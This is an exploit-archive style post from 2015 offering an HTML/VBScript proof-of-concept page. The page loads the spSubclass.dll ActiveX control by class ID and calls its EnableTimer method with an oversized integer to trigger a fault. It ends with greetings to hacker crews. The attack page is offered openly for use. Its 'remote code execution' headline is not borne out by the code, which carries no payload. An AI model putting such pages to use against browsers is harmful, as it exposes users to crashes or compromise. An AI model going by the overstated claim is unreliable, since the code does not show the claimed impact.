facebook facebook twitter rss

ComRaider v0.0.134 spSubclass.dll ActiveX Control Remote Code Execution Exploit

Author: indoushka , Published: 05-06-2015
| # Title    : ComRaider v0.0.134 spSubclass.dll ActiveX Control Remote Code Execution Exploit
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : David Zimmer
| # Tested on: win8.1 Fr x64 V.(Pro) 01:39 * 02/06/2015
| # Bug : ActiveX Control Remote Code Execution
| # Download : http://Labs.idefense.com
=======================================

<html>
Test Exploit page
<object classid='clsid:93F0F964-789A-4E21-85D4-12103718356A' id='target' ></object>
<script language='vbscript'>

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Windows\spSubclass.dll"
prototype = "Sub EnableTimer ( ByRef mInterval As Long )"
memberName = "EnableTimer"
progid = "spSubClass.CTimer"
argCount = 1

arg1=2147483647

target.EnableTimer arg1

</script>



Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------

Like us on Facebook :